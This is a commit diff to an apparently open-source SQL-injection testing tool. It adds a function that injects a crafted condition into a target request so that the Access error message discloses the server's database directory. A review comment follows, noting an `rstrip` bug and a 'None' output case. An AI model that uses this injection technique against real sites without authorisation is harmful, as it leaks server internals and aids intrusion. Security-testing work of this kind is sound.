
Commit 6ad8bbf

committed
one more ms access update
1 parent c98d8fe commit 6ad8bbf

1 file changed

Lines changed: 30 additions & 2 deletions


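--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -14,6 +14,8 @@
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
 from lib.core.common import randomInt
+from lib.core.common import randomStr
+from lib.core.common import wasLastRequestError
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -42,13 +44,13 @@ def __sandBoxCheck(self):
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
 retVal = "not sandboxed" if result else "sandboxed"
-
+
 return retVal
 
 def __sysTablesCheck(self):
 infoMsg = "executing system table(s) existance fingerprint"
 logger.info(infoMsg)
-
+
 # Microsoft Access table reference updated on 01/2010
 sysTables = {
 "97": ("MSysModules2", "MSysAccessObjects"),
@@ -83,6 +85,30 @@ def __sysTablesCheck(self):
 
 return None
 
+def __getDatabaseDir(self):
+retVal = None
+
+infoMsg = "searching for database directory"
+logger.info(infoMsg)
+
+randInt = randomInt()
+randStr = randomStr()
+query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
+query = agent.postfixQuery(query)
+payload = agent.payload(newValue=query)
+page = Request.queryPage(payload, content=True)
+
+if wasLastRequestError():
+match = re.search("Could not find file\s+'([^']+?)'", page[0])
+
+if match:
+retVal = match.group(1).rstrip("%s.mdb" % randStr)
+
+if retVal.endswith('\\'):
+retVal = retVal[:-1]
+
+return retVal
+
 def getFingerprint(self):
 value = ""
 wsOsFp = formatFingerprint("web server", kb.headersFp)
@@ -120,6 +146,8 @@ def getFingerprint(self):
 if htmlErrorFp:
 value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
 
+value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
+
 return value
 
 def checkDbms(self):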
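Review bot: In `__getDatabaseDir`, `match.group(1).rstrip("%s.mdb" % randStr)` treats its argument as a set of characters rather than a suffix, so it keeps stripping any trailing characters that fall in that set; it only yields the directory when a path separator stops it, and a message carrying a bare file name would collapse to an empty string. Removing the suffix explicitly is safer: `path = match.group(1)`, `suffix = "%s.mdb" % randStr`, `retVal = path[:-len(suffix)] if path.endswith(suffix) else path`. Separately, `getFingerprint` formats the result unconditionally, so a lookup that finds nothing prints `database directory: 'None'`; guarding that line on the returned value would keep the report accurate. The regex literal would also read better as a raw string, and `re` is not among the imports visible in this section, so confirm it is imported at the top of the file.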
